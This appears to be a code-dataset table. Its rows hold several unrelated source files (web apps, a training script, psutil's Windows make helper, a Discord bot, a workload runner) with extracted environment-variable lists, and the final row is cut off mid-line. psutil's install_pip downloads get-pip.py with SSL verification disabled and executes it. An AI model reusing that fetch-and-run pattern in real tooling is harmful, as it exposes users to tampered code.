filename
stringlengths 4
198
| content
stringlengths 25
939k
| environment
list | variablearg
list | constarg
list | variableargjson
stringclasses 1
value | constargjson
stringlengths 2
3.9k
| lang
stringclasses 3
values | constargcount
float64 0
129
⌀ | variableargcount
float64 0
0
⌀ | sentence
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|
app.py | import os
import bottle
import pymongo
import redis
from rq import Queue
from worker import arxiv_worker
host = '0.0.0.0'
port = os.environ.get('PORT', 8080)
redis_url = os.environ.get('REDIS_URL', 'redis://queue:6379')
mongodb_url = os.environ.get('MONGODB_URL', 'mongodb://db:27017/db')
is_production = os.environ.get('DEBUG', False)
print('is_production:', is_production)
# setup database
mongo_client = pymongo.MongoClient(mongodb_url)
db = mongo_client.get_default_database()
papers = db.papers
# setup job queue
print('redis_url:', redis_url)
redis_conn = redis.from_url(redis_url)
queue = Queue(connection=redis_conn)
@bottle.route('/static/<filepath:path>')
def server_static(filepath):
return bottle.static_file(
filepath,
root=os.path.join(
os.path.dirname(os.path.realpath(__file__)), './static'))
@bottle.get('/')
def welcome():
return bottle.template("""
% rebase('template/base.tpl', title='Readable Paper')
<style>
body {
text-align: center;
}
</style>
<form onSubmit="location.pathname='/arxiv/'+document.querySelector('#field').value; return false">
<input type="text" id="field" placeholder="arXiv ID" />
<button type="submit">Convert</button>
<p>Supports <a href="https://arxiv.org">arXiv</a> papers.</p>
<p>Put arXiv ID into textarea to convert (e.g. <b>1612.04811v1</b>)</p>
</form>
""")
@bottle.get('/arxiv/<id>')
def arxiv_get(id):
if redis_conn.exists(id):
job = queue.fetch_job(redis_conn.get(id).decode('utf-8'))
if job is None:
redis_conn.delete(id)
elif job.result is None:
return bottle.template("""
% rebase('template/base.tpl', title='Readable Paper')
<p>Converting now! Wait for a sec and refresh this page</p>
""")
paper = papers.find_one({"arxiv_id": id})
if paper:
return bottle.template(
"""
% rebase('template/base.tpl', title='Readable Paper')
<div class="paper">
<blockquote>
<a href="https://arxiv.org/abs/{{arxiv_id}}">Original source</a>
</blockquote>
{{!content}}
</div>
""",
content=paper['content'],
arxiv_id=id)
else:
# enqueue job and push job id to DB
job = queue.enqueue(arxiv_worker.fetch_and_convert_tex, id)
redis_conn.set(id, job.id.encode('utf-8'))
return bottle.template("""
% rebase('template/base.tpl', title='Readable Paper')
<p>Process has been started! Refresh this page later</p>
""")
bottle.run(host=host, port=port, server='paste', debug=(not is_production))
| []
| []
| [
"PORT",
"MONGODB_URL",
"REDIS_URL",
"DEBUG"
]
| [] | ["PORT", "MONGODB_URL", "REDIS_URL", "DEBUG"] | python | 4 | 0 | |
pygoat/wsgi.py | """
WSGI config for pygoat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pygoat.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
train.py | import os
from torch.backends import cudnn
from utils.logger import setup_logger
from datasets import make_dataloader
from model import make_model
from solver import make_optimizer, WarmupMultiStepLR
from loss import make_loss
from processor import do_train
import random
import torch
import numpy as np
import os
import argparse
from config import cfg
if __name__ == '__main__':
torch.manual_seed(1234)
torch.cuda.manual_seed(1234)
torch.cuda.manual_seed_all(1234)
np.random.seed(1234)
random.seed(1234)
torch.backends.cudnn.deterministic = True
cudnn.benchmark = True
parser = argparse.ArgumentParser(description="ReID Baseline Training")
parser.add_argument(
"--config_file", default="", help="path to config file", type=str
)
parser.add_argument("opts", help="Modify config options using the command-line", default=None,
nargs=argparse.REMAINDER)
args = parser.parse_args()
if args.config_file != "":
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
output_dir = cfg.OUTPUT_DIR
if output_dir and not os.path.exists(output_dir):
os.makedirs(output_dir)
logger = setup_logger("reid_baseline", output_dir, if_train=True)
logger.info("Saving model in the path :{}".format(cfg.OUTPUT_DIR))
logger.info(args)
if args.config_file != "":
logger.info("Loaded configuration file {}".format(args.config_file))
with open(args.config_file, 'r') as cf:
config_str = "\n" + cf.read()
logger.info(config_str)
logger.info("Running with config:\n{}".format(cfg))
os.environ['CUDA_VISIBLE_DEVICES'] = cfg.MODEL.DEVICE_ID
train_loader, val_loader, num_query, num_classes = make_dataloader(cfg)
if cfg.MODEL.PRETRAIN_CHOICE == 'finetune':
model = make_model(cfg, num_class=num_classes)
model.load_param_finetune(cfg.MODEL.PRETRAIN_PATH)
print('Loading pretrained model for finetuning......')
else:
model = make_model(cfg, num_class=num_classes)
loss_func, center_criterion = make_loss(cfg, num_classes=num_classes)
optimizer, optimizer_center = make_optimizer(cfg, model, center_criterion)
scheduler = WarmupMultiStepLR(optimizer, cfg.SOLVER.STEPS, cfg.SOLVER.GAMMA,
cfg.SOLVER.WARMUP_FACTOR,
cfg.SOLVER.WARMUP_EPOCHS, cfg.SOLVER.WARMUP_METHOD)
do_train(
cfg,
model,
center_criterion,
train_loader,
val_loader,
optimizer,
optimizer_center,
scheduler, # modify for using self trained model
loss_func,
num_query
)
| []
| []
| [
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_VISIBLE_DEVICES"] | python | 1 | 0 | |
scripts/internal/winmake.py | #!/usr/bin/env python
# Copyright (c) 2009 Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shortcuts for various tasks, emulating UNIX "make" on Windows.
This is supposed to be invoked by "make.bat" and not used directly.
This was originally written as a bat file but they suck so much
that they should be deemed illegal!
"""
from __future__ import print_function
import errno
import fnmatch
import functools
import os
import shutil
import site
import ssl
import subprocess
import sys
import tempfile
APPVEYOR = bool(os.environ.get('APPVEYOR'))
if APPVEYOR:
PYTHON = sys.executable
else:
PYTHON = os.getenv('PYTHON', sys.executable)
TSCRIPT = os.getenv('TSCRIPT', 'psutil\\tests\\__main__.py')
GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
PY3 = sys.version_info[0] == 3
HERE = os.path.abspath(os.path.dirname(__file__))
ROOT_DIR = os.path.realpath(os.path.join(HERE, "..", ".."))
DEPS = [
"coverage",
"flake8",
"nose",
"pdbpp",
"perf",
"pip",
"pypiwin32==219" if sys.version_info[:2] <= (3, 4) else "pypiwin32",
"pyreadline",
"setuptools",
"wheel",
"wmi",
"requests"
]
if sys.version_info[:2] <= (2, 6):
DEPS.append('unittest2')
if sys.version_info[:2] <= (2, 7):
DEPS.append('mock')
if sys.version_info[:2] <= (3, 2):
DEPS.append('ipaddress')
_cmds = {}
if PY3:
basestring = str
# ===================================================================
# utils
# ===================================================================
def safe_print(text, file=sys.stdout, flush=False):
"""Prints a (unicode) string to the console, encoded depending on
the stdout/file encoding (eg. cp437 on Windows). This is to avoid
encoding errors in case of funky path names.
Works with Python 2 and 3.
"""
if not isinstance(text, basestring):
return print(text, file=file)
try:
file.write(text)
except UnicodeEncodeError:
bytes_string = text.encode(file.encoding, 'backslashreplace')
if hasattr(file, 'buffer'):
file.buffer.write(bytes_string)
else:
text = bytes_string.decode(file.encoding, 'strict')
file.write(text)
file.write("\n")
def sh(cmd, nolog=False):
if not nolog:
safe_print("cmd: " + cmd)
p = subprocess.Popen(cmd, shell=True, env=os.environ, cwd=os.getcwd())
p.communicate()
if p.returncode != 0:
sys.exit(p.returncode)
def cmd(fun):
@functools.wraps(fun)
def wrapper(*args, **kwds):
return fun(*args, **kwds)
_cmds[fun.__name__] = fun.__doc__
return wrapper
def rm(pattern, directory=False):
"""Recursively remove a file or dir by pattern."""
def safe_remove(path):
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
else:
safe_print("rm %s" % path)
def safe_rmtree(path):
def onerror(fun, path, excinfo):
exc = excinfo[1]
if exc.errno != errno.ENOENT:
raise
existed = os.path.isdir(path)
shutil.rmtree(path, onerror=onerror)
if existed:
safe_print("rmdir -f %s" % path)
if "*" not in pattern:
if directory:
safe_rmtree(pattern)
else:
safe_remove(pattern)
return
for root, subdirs, subfiles in os.walk('.'):
root = os.path.normpath(root)
if root.startswith('.git/'):
continue
found = fnmatch.filter(subdirs if directory else subfiles, pattern)
for name in found:
path = os.path.join(root, name)
if directory:
safe_print("rmdir -f %s" % path)
safe_rmtree(path)
else:
safe_print("rm %s" % path)
safe_remove(path)
def safe_remove(path):
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
else:
safe_print("rm %s" % path)
def safe_rmtree(path):
def onerror(fun, path, excinfo):
exc = excinfo[1]
if exc.errno != errno.ENOENT:
raise
existed = os.path.isdir(path)
shutil.rmtree(path, onerror=onerror)
if existed:
safe_print("rmdir -f %s" % path)
def recursive_rm(*patterns):
"""Recursively remove a file or matching a list of patterns."""
for root, subdirs, subfiles in os.walk(u'.'):
root = os.path.normpath(root)
if root.startswith('.git/'):
continue
for file in subfiles:
for pattern in patterns:
if fnmatch.fnmatch(file, pattern):
safe_remove(os.path.join(root, file))
for dir in subdirs:
for pattern in patterns:
if fnmatch.fnmatch(dir, pattern):
safe_rmtree(os.path.join(root, dir))
def test_setup():
os.environ['PYTHONWARNINGS'] = 'all'
os.environ['PSUTIL_TESTING'] = '1'
os.environ['PSUTIL_DEBUG'] = '1'
# ===================================================================
# commands
# ===================================================================
@cmd
def help():
"""Print this help"""
safe_print('Run "make [-p <PYTHON>] <target>" where <target> is one of:')
for name in sorted(_cmds):
safe_print(
" %-20s %s" % (name.replace('_', '-'), _cmds[name] or ''))
sys.exit(1)
@cmd
def build():
"""Build / compile"""
# Make sure setuptools is installed (needed for 'develop' /
# edit mode).
sh('%s -c "import setuptools"' % PYTHON)
sh("%s setup.py build" % PYTHON)
# Copies compiled *.pyd files in ./psutil directory in order to
# allow "import psutil" when using the interactive interpreter
# from within this directory.
sh("%s setup.py build_ext -i" % PYTHON)
# Make sure it actually worked.
sh('%s -c "import psutil"' % PYTHON)
@cmd
def wheel():
"""Create wheel file."""
build()
sh("%s setup.py bdist_wheel" % PYTHON)
@cmd
def upload_wheels():
"""Upload wheel files on PYPI."""
build()
sh("%s -m twine upload dist/*.whl" % PYTHON)
@cmd
def install_pip():
"""Install pip"""
try:
import pip # NOQA
except ImportError:
if PY3:
from urllib.request import urlopen
else:
from urllib2 import urlopen
if hasattr(ssl, '_create_unverified_context'):
ctx = ssl._create_unverified_context()
else:
ctx = None
kw = dict(context=ctx) if ctx else {}
safe_print("downloading %s" % GET_PIP_URL)
req = urlopen(GET_PIP_URL, **kw)
data = req.read()
tfile = os.path.join(tempfile.gettempdir(), 'get-pip.py')
with open(tfile, 'wb') as f:
f.write(data)
try:
sh('%s %s --user' % (PYTHON, tfile))
finally:
os.remove(tfile)
@cmd
def install():
"""Install in develop / edit mode"""
install_git_hooks()
build()
sh("%s setup.py develop" % PYTHON)
@cmd
def uninstall():
"""Uninstall psutil"""
# Uninstalling psutil on Windows seems to be tricky.
# On "import psutil" tests may import a psutil version living in
# C:\PythonXY\Lib\site-packages which is not what we want, so
# we try both "pip uninstall psutil" and manually remove stuff
# from site-packages.
clean()
install_pip()
here = os.getcwd()
try:
os.chdir('C:\\')
while True:
try:
import psutil # NOQA
except ImportError:
break
else:
sh("%s -m pip uninstall -y psutil" % PYTHON)
finally:
os.chdir(here)
for dir in site.getsitepackages():
for name in os.listdir(dir):
if name.startswith('psutil'):
rm(os.path.join(dir, name))
@cmd
def clean():
"""Deletes dev files"""
recursive_rm(
"$testfn*",
"*.bak",
"*.core",
"*.egg-info",
"*.orig",
"*.pyc",
"*.pyd",
"*.pyo",
"*.rej",
"*.so",
"*.~",
"*__pycache__",
".coverage",
".tox",
)
safe_rmtree("build")
safe_rmtree(".coverage")
safe_rmtree("dist")
safe_rmtree("docs/_build")
safe_rmtree("htmlcov")
safe_rmtree("tmp")
@cmd
def setup_dev_env():
"""Install useful deps"""
install_pip()
install_git_hooks()
sh("%s -m pip install -U %s" % (PYTHON, " ".join(DEPS)))
@cmd
def flake8():
"""Run flake8 against all py files"""
py_files = subprocess.check_output("git ls-files")
if PY3:
py_files = py_files.decode()
py_files = [x for x in py_files.split() if x.endswith('.py')]
py_files = ' '.join(py_files)
sh("%s -m flake8 %s" % (PYTHON, py_files), nolog=True)
@cmd
def test():
"""Run tests"""
install()
test_setup()
sh("%s %s" % (PYTHON, TSCRIPT))
@cmd
def coverage():
"""Run coverage tests."""
# Note: coverage options are controlled by .coveragerc file
install()
test_setup()
sh("%s -m coverage run %s" % (PYTHON, TSCRIPT))
sh("%s -m coverage report" % PYTHON)
sh("%s -m coverage html" % PYTHON)
sh("%s -m webbrowser -t htmlcov/index.html" % PYTHON)
@cmd
def test_process():
"""Run process tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_process.py" % PYTHON)
@cmd
def test_system():
"""Run system tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_system.py" % PYTHON)
@cmd
def test_platform():
"""Run windows only tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_windows.py" % PYTHON)
@cmd
def test_misc():
"""Run misc tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_misc.py" % PYTHON)
@cmd
def test_unicode():
"""Run unicode tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_unicode.py" % PYTHON)
@cmd
def test_connections():
"""Run connections tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_connections.py" % PYTHON)
@cmd
def test_contracts():
"""Run contracts tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_contracts.py" % PYTHON)
@cmd
def test_by_name():
"""Run test by name"""
try:
safe_print(sys.argv)
name = sys.argv[2]
except IndexError:
sys.exit('second arg missing')
install()
test_setup()
sh("%s -m unittest -v %s" % (PYTHON, name))
@cmd
def test_script():
"""Quick way to test a script"""
try:
safe_print(sys.argv)
name = sys.argv[2]
except IndexError:
sys.exit('second arg missing')
install()
test_setup()
sh("%s %s" % (PYTHON, name))
@cmd
def test_memleaks():
"""Run memory leaks tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_memory_leaks.py" % PYTHON)
@cmd
def install_git_hooks():
"""Install GIT pre-commit hook."""
if os.path.isdir('.git'):
src = os.path.join(ROOT_DIR, ".git-pre-commit")
dst = os.path.realpath(
os.path.join(ROOT_DIR, ".git", "hooks", "pre-commit"))
with open(src, "rt") as s:
with open(dst, "wt") as d:
d.write(s.read())
@cmd
def bench_oneshot():
"""Benchmarks for oneshot() ctx manager (see #799)."""
install()
sh("%s -Wa scripts\\internal\\bench_oneshot.py" % PYTHON)
@cmd
def bench_oneshot_2():
"""Same as above but using perf module (supposed to be more precise)."""
install()
sh("%s -Wa scripts\\internal\\bench_oneshot_2.py" % PYTHON)
def set_python(s):
global PYTHON
if os.path.isabs(s):
PYTHON = s
else:
# try to look for a python installation
orig = s
s = s.replace('.', '')
vers = ('26', '27', '34', '35', '36', '37',
'26-64', '27-64', '34-64', '35-64', '36-64', '37-64')
for v in vers:
if s == v:
path = 'C:\\python%s\python.exe' % s
if os.path.isfile(path):
print(path)
PYTHON = path
os.putenv('PYTHON', path)
return
return sys.exit(
"can't find any python installation matching %r" % orig)
def parse_cmdline():
if '-p' in sys.argv:
try:
pos = sys.argv.index('-p')
sys.argv.pop(pos)
py = sys.argv.pop(pos)
except IndexError:
return help()
set_python(py)
def main():
parse_cmdline()
try:
cmd = sys.argv[1].replace('-', '_')
except IndexError:
return help()
if cmd in _cmds:
fun = getattr(sys.modules[__name__], cmd)
fun()
else:
help()
if __name__ == '__main__':
main()
| []
| []
| [
"APPVEYOR",
"TSCRIPT",
"PYTHON",
"PYTHONWARNINGS",
"PSUTIL_DEBUG",
"PSUTIL_TESTING"
]
| [] | ["APPVEYOR", "TSCRIPT", "PYTHON", "PYTHONWARNINGS", "PSUTIL_DEBUG", "PSUTIL_TESTING"] | python | 6 | 0 | |
music.py | import asyncio
import os
import discord
from discord.ext import commands
from discord.ext.commands.core import command
from pytube import *
from random import shuffle
class Music(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.is_playing = False
self.shuffled = False
self.now_playing = ""
self.music_queue = []
self.vc = ""
self.FFMPEG_OPTIONS = {"before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5", "options": "-vn"}
@commands.Cog.listener()
async def on_voice_state_update(self, member, before, after):
if not member.id == self.bot.user.id:
return
elif before.channel is None:
time = 0
while True:
await asyncio.sleep(1)
if len(self.vc.channel.voice_states.keys()) == 1:
await self.vc.disconnect()
if not self.vc.is_connected():
break
def play_next(self):
if len(self.music_queue) > 0:
self.is_playing = True
source = self.music_queue[0][0]
self.now_playing = self.music_queue[0][1]
self.music_queue.pop(0)
self.vc.play(discord.FFmpegPCMAudio(source, **self.FFMPEG_OPTIONS), after = lambda e: self.play_next())
else:
self.is_playing = False
async def play_music(self, ctx):
if len(self.music_queue) > 0:
self.is_playing = True
source = self.music_queue[0][0]
if self.vc == "" or not self.vc.is_connected() or self.vc is None:
self.vc = await self.music_queue[0][2].connect()
else:
await self.vc.move_to(self.music_queue[0][2])
self.now_playing = self.music_queue[0][1]
await ctx.send(f"Now Playing: {self.music_queue[0][1]}")
self.vc.play(discord.FFmpegPCMAudio(source, **self.FFMPEG_OPTIONS), after = lambda e: self.play_next())
self.music_queue.pop(0)
else:
self.is_playing = False
@commands.command(name = "play", help = "Searches or plays link")
async def play(self, ctx, *args):
query = " ".join(args)
voice_channel = ctx.author.voice.channel
if voice_channel is None:
await ctx.send("Connect to a Voice Channel")
else:
if "youtube.com/playlist" in query:
playlist = Playlist(query)
furl = playlist.video_urls[0]
fytObject = YouTube(furl)
fytSource = fytObject.streams.get_audio_only().url
fytTitle = fytObject.title
self.music_queue.append([fytSource, fytTitle, voice_channel])
message = await ctx.send(f"{fytTitle} Added to the Queue, Added 1/{len(playlist.video_urls)}")
if not self.is_playing:
await self.play_music(ctx)
for i in range(1, len(playlist.video_urls)):
url = playlist.video_urls[i]
ytObject = YouTube(url)
ytSource = ytObject.streams.get_audio_only().url
ytTitle = ytObject.title
self.music_queue.append([ytSource, ytTitle, voice_channel])
await message.edit(content = f"{fytTitle} Added to the Queue, Added {i+1}/{len(playlist.video_urls)}")
elif ("youtube.com/watch" in query) or ("youtu.be/" in query) or ("youtube.com/shorts" in query):
loopCount = 1
if "-loop" in query:
ytObject = YouTube(str(query).split('-loop')[0])
try:
loopCount = int(str(query).split('-loop')[1])
except:
await ctx.send(f"Invalid iterator")
else:
ytObject = YouTube(str(query))
ytSource = ytObject.streams.get_audio_only().url
ytTitle = ytObject.title
for i in range(0, loopCount):
self.music_queue.append([ytSource, ytTitle, voice_channel])
if loopCount == 1:
await ctx.send(f"{ytTitle} Added to the Queue")
else:
await ctx.send(f"{ytTitle} Added to the Queue {loopCount} times!")
if not self.is_playing:
await self.play_music(ctx)
else:
searchObject = Search(query)
searchResults = ""
for i in range(0, 10):
searchResults += f"{i+1} - {searchObject.results[i].title}\n"
message = await ctx.send(searchResults)
def check(reply):
return reply.content.startswith ("!",0) and reply.author == ctx.author and reply.channel == ctx.channel
rChoice = await bot.wait_for("message", check = check, timeout = 15)
choice = int(rChoice.content[1:])
ytSource = searchObject.results[choice-1].streams.get_audio_only().url
ytTitle = searchObject.results[choice-1].title
self.music_queue.append([ytSource, ytTitle, voice_channel])
await message.edit(content = f"{ytTitle} Added to the Queue")
if not self.is_playing:
await self.play_music(ctx)
if self.shuffled:
shuffle(self.music_queue)
@commands.command(name = "stream", help = "Streams audio from live stream URL")
async def stream(self, ctx, url):
voice_channel = ctx.author.voice.channel
if voice_channel is None:
await ctx.send("Connect to a Voice Channel")
else:
await ctx.send(f"{url} Added to the Queue")
self.music_queue.append([url, url, voice_channel])
if not self.is_playing:
await self.play_music(ctx)
if self.shuffled:
shuffle(self.music_queue)
@commands.command(name = "clean", help = "Streams audio from live stream URL")
async def clean(self, ctx):
self.music_queue.clear()
await ctx.send("Cleaned queue")
@commands.command(name = "shuffle", help = "Shuffles queue until disabled")
async def shuffle(self, ctx):
if not self.shuffled:
shuffle(self.music_queue)
self.shuffled = True
await ctx.send("Shuffle Enabled")
else:
self.shuffled = False
await ctx.send("Shuffle Disabled")
@commands.command(name = "now", help = "Shows current song")
async def now(self, ctx):
if not self.is_playing:
await ctx.send(f"Not Playing")
else:
await ctx.send(f"Now Playing: {self.now_playing}")
@commands.command(name = "queue", help = "Shows queue")
async def queue(self, ctx):
retVal = ""
for i in range(0, len(self.music_queue)):
retVal += f"{i+1} - {self.music_queue[i][1]}\n"
if retVal != "":
await ctx.send(f"Now Playing: {self.now_playing}\n{retVal}")
else:
if self.is_playing:
await ctx.send(f"Now Playing: {self.now_playing}\nQueue Empty")
elif not self.is_playing:
await ctx.send("Not Playing and Queue Empty")
@commands.command(name = "skip", help = "Skips current song")
async def skip(self, ctx):
await ctx.send("Current Song Skipped")
self.vc.stop()
await self.play_music(ctx)
@commands.command(name = "skipto", help = "Skips to selected index in queue")
async def skipto(self, ctx, *args):
num = "".join(*args)
if self.vc != "" and self.vc:
if int(num) == 1:
await ctx.send("Current Song Skipped")
self.vc.stop()
await self.play_music(ctx)
elif int(num) >= 1:
await ctx.send(f"Skipped {num} Songs")
self.vc.stop()
del self.music_queue[0:(int(num)-1)]
await self.play_music(ctx)
else:
await ctx.send("Current Song Skipped")
self.vc.stop()
await self.play_music(ctx)
@commands.command(name = "remove", help = "Removes song from queue at selected index")
async def remove(self, ctx, *args):
i = "".join(*args)
await ctx.send(f"{self.music_queue[i][1]} Removed from the Queue")
self.music_queue.pop(i)
@commands.command(name = "pause", help = "Pauses music")
async def pause(self, ctx):
self.vc.pause()
await ctx.send("Paused Music")
@commands.command(name = "resume", help = "Resumes music")
async def resume(self, ctx):
self.vc.resume()
await ctx.send("Resumed Music")
@commands.command(name = "stop", help = "Stops music and clears queue")
async def stop(self, ctx):
self.vc.stop()
self.music_queue = []
self.shuffled = False
await ctx.send("Music Stopped and Queue Cleared")
@commands.command(name = "leave", help = "Stops music, clears queue and leaves")
async def leave(self, ctx):
if self.vc.is_connected():
self.vc.stop()
self.music_queue = []
await ctx.send("Leaving Voice Channel")
await self.vc.disconnect(force=True)
bot = commands.Bot(command_prefix = "!", case_insensitive=True)
bot.add_cog(Music(bot))
@bot.command(name = "ping", help = "Shows bot latency")
async def ping(ctx):
await ctx.send(f"Latency: {round(bot.latency * 1000)}ms")
@bot.event
async def on_ready():
print("Bot Online")
await bot.change_presence(activity = discord.Activity(type = discord.ActivityType.listening, name = "Music | !help"))
bot.run(os.getenv("TOKEN"))
| []
| []
| [
"TOKEN"
]
| [] | ["TOKEN"] | python | 1 | 0 | |
kstreams-live-update/event-source/src/main/java/io/debezium/examples/kstreams/liveupdate/eventsource/Main.java | /*
* Copyright Debezium Authors.
*
* Licensed under the Apache Software License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0
*/
package io.debezium.examples.kstreams.liveupdate.eventsource;
public class Main {
private void run() {
String databaseServer = System.getenv("DATABASE_SERVER");
if (databaseServer == null) {
/* backwards compatibility */
databaseServer = "mysql";
}
EventSource source = new EventSource(databaseServer);
Runtime.getRuntime().addShutdownHook(new Thread(() -> {
System.out.println("Stopping...");
source.stop();
}));
source.run();
}
public static void main(String[] args) {
new Main().run();
}
}
| [
"\"DATABASE_SERVER\""
]
| []
| [
"DATABASE_SERVER"
]
| [] | ["DATABASE_SERVER"] | java | 1 | 0 | |
backend/old_heart_29880/wsgi.py | """
WSGI config for old_heart_29880 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'old_heart_29880.settings')
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
proxy/init.go | package proxy
import (
"os"
"reflect"
"github.com/globalsign/mgo"
"github.com/goulang/goulang/models"
)
var User *userProxy
var Qiniu *qiniuProxy
var Topic *topicProxy
var Comment *commentProxy
func init() {
session, err := mgo.Dial(os.Getenv("MONGO"))
if err != nil {
panic(err)
}
User = &userProxy{baseProxy{session.DB("goulang").C("user"), reflect.TypeOf((*models.User)(nil)).Elem()}}
Qiniu = &qiniuProxy{baseProxy{session.DB("goulang").C("qiniu"), reflect.TypeOf((*models.QFile)(nil)).Elem()}}
Topic = &topicProxy{baseProxy{session.DB("goulang").C("topic"), reflect.TypeOf((*models.Topic)(nil)).Elem()}}
Comment = &commentProxy{baseProxy{session.DB("goulang").C("comment"), reflect.TypeOf((*models.Comment)(nil)).Elem()}}
}
| [
"\"MONGO\""
]
| []
| [
"MONGO"
]
| [] | ["MONGO"] | go | 1 | 0 | |
wikipedia_workload/de/uni-stuttgart/iaas/workload/workloadExecutor.py | import os
from workload import constants as cs
import jprops as jprops
from csvHelper import csvHelper as csvHelper
import pandas as pd
import subprocess
# Run Workload Executor in background: python workloadExecutor.py >> /home/ubuntu/SCARF-Evaluation/wikipedia_workload/result_experiments_summary/T5_r1.log 2>&1 &
def getDateFromFileName(fileName):
split1 = fileName.split('-')
print split1
# Generate the File List & Read Files
pageCountFileList = csvHelper.retrieve_files_time_interval(cs.WIKISTATS_BEGIN_YEAR, cs.WIKISTATS_BEGIN_MONTH,
cs.WIKISTATS_BEGIN_DAY, cs.WIKISTATS_END_YEAR, cs.WIKISTATS_END_MONTH,
cs.WIKISTATS_END_DAY, cs.WIKISTATS_HOURS, cs.WIKISTATS_PAGECOUNTS)
generatedWorkloadFileList = [(cs.WIKISTATS_GENERATED_WORKLOAD_PREFIX + i + cs.WIKISTATS_FILE_SCALED_SUFFIX + '.csv')
for i in pageCountFileList]
output_workload_config_file = cs.DATA_LOCAL_PATH + 'workload_hourly_distribution_scaled_factor100.csv'
df_workload_config = pd.read_csv(output_workload_config_file, delimiter=' ')
# For each generated workload file:
# 1) Read the Workload Config Parameters for Each Hour and generate a custom config parameters file
# 2) Execute the jmeter load executer from Sherif
# 3) Save the result
count_workload_file_list = 0
for index,row in df_workload_config.iterrows():
config_properties = {cs.CONFIG_TEST_PLAN_PATH_VAR: cs.CONFIG_TEST_PLAN_PATH_VALUE,
cs.CONFIG_JMETER_PATH_VAR: cs.CONFIG_JMETER_PATH_VALUE}
scenario_id_value = pageCountFileList[count_workload_file_list].split('-')[1] + '-' + \
pageCountFileList[count_workload_file_list].split('-')[2]
##### Approach using the Dynamic Load Tester - Sherif
argument_properties = {cs.ARGUMENTS_JMETER_SCENARIO_ID_VAR: scenario_id_value,
cs.ARGUMENTS_JMETER_ROUND_ID_VAR: cs.ARGUMENTS_JMETER_ROUND_ID_VALUE,
cs.ARGUMENTS_JMETER_HTTP_HOST_VAR: cs.ARGUMENTS_JMETER_HTTP_HOST_VALUE,
cs.ARGUMENTS_JMETER_HTTP_PORT_VAR: cs.ARGUMENTS_JMETER_HTTP_PORT_VALUE,
cs.ARGUMENTS_JMETER_HTTP_PATH_VAR: cs.ARGUMENTS_JMETER_HTTP_PATH_VALUE,
cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VAR : cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VALUE,
cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VAR: cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VALUE,
cs.ARGUMENTS_JMETER_RESULTS_PATH_VAR: cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE,
cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VAR: cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VALUE
}
print "Processing File: " + generatedWorkloadFileList[count_workload_file_list]
concurrent_users = str(int(row[cs.GENERATED_WORKLOAD_COL_HOURLY_CONCURRENT_USERS]) / 10)
thread_loop = cs.ARGUMENTS_JMETER_LOOP_PER_THREAD_VALUE
thread_rampup = cs.ARGUMENTS_JMETER_THREAD_RAMPUP_VALUE
workload_file_path = cs.ARGUMENTS_JMETER_WORKLOAD_CSV_PATH_VALUE + generatedWorkloadFileList[count_workload_file_list]
workload_file_num_csv_rows = str(len(pd.read_csv(cs.DATA_LOCAL_PATH + generatedWorkloadFileList[count_workload_file_list], delimiter=' ')))
hourly_sum_requests = str(int(row[cs.GENERATED_WORKLOAD_COL_SUM_REQS]))
argument_properties[cs.ARGUMENTS_JMETER_NUMBER_THREADS_VAR] = concurrent_users
argument_properties[cs.ARGUMENTS_JMETER_LOOP_PER_THREAD_VAR] = thread_loop
argument_properties[cs.ARGUMENTS_JMETER_THREAD_RAMPUP_VAR] = thread_rampup
argument_properties[cs.ARGUMENTS_JMETER_WORKLOAD_CSV_PATH_VAR] = workload_file_path
argument_properties[cs.ARGUMENTS_JMETER_WORKLOAD_CSV_NUM_ROWS_VAR] = workload_file_num_csv_rows
with open(cs.LOAD_TEST_CONFIG_FILE, 'w+') as fp:
jprops.store_properties(fp, config_properties)
with open(cs.LOAD_TEST_ARGUMENTS_FILE, 'w+') as fp:
jprops.store_properties(fp, argument_properties)
config_properties_file_path = cs.LOAD_TEST_CONFIG_FILE
arguments_properties_file_path = cs.LOAD_TEST_ARGUMENTS_FILE
#subprocess.call(['java', '-jar', cs.JAR_LOAD_TEST_PATH, config_properties_file_path, arguments_properties_file_path])
##### Alternative Approach using directly the JMeter JAR
jmeter_test_plan = cs.CONFIG_TEST_PLAN_PATH_VALUE
# Creating directory for the scenario results
if not os.path.exists(cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE + '/' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VALUE):
